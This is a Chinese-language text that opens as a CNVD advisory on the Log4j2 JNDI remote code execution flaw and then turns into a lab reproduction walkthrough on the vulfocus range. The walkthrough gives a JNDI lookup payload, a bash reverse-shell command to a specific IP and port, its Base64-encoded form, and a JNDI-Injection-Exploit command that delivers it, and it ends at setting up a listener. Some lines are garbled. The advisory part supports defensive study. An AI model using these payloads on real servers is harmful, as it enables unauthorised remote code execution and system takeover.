安全公告编号:CNTA-2021-0032

2021年12月10日，国家信息安全漏洞共享平台（CNVD）收录了Apache Log4j2远程代码执行漏洞（CNVD-2021-95914）。攻击者利用该漏洞，可在未授权的情况下远程执行代码。目前，漏洞利用细节已公开，Apache官方已发布补丁修复该漏洞。CNVD建议受影响用户立即更新至最新版本，同时采取防范性措施避免漏洞攻击威胁。

一、漏洞情况分析

Apache Log4j是一个基于Java的日志记录组件。Apache Log4j2是Log4j的升级版本，通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发，用以记录程序输入输出日志信息。

2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向目标服务器发送精心构造的恶意数据，触发Log4j2组件解析缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。

CNVD对该漏洞的综合评级为“高危”。

二、漏洞影响范围

漏洞影响的产品版本包括：

Apache Log4j2 2.0 - 2.15.0-rc1

本次复现使用vulfocus靶场，地址：vulfocus.cn

打开后是一个web页面

打开burp抓包，点击？？？？？

通过DNSLog平台（http://www.dnslog.cn/）获取到域名vdiftj.dnslog.cnhttp://，构造payload，

${jndi:ldap://vdiftj.dnslog.cn}

我们要将payload进行url编码

发包

我们可以在dnslog上看到返回的结果

接下来，用JNDI注入反弹shell，其中，ip为kali的ip

bash -i >& /dev/tcp/58.217.249.149/4444 0>&1

将命令进行Base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC81OC4yMTcuMjQ5LjE0OS80NDQ0IDA+JjE=

编码后的命令通过-C参数输入JNDI工具，通过通过-A参数指定kali的ip地址：

JNDI工具：JNDI工具下载

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC81OC4yMTcuMjQ5LjE0OS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 58.217.249.149

在另一个窗口监听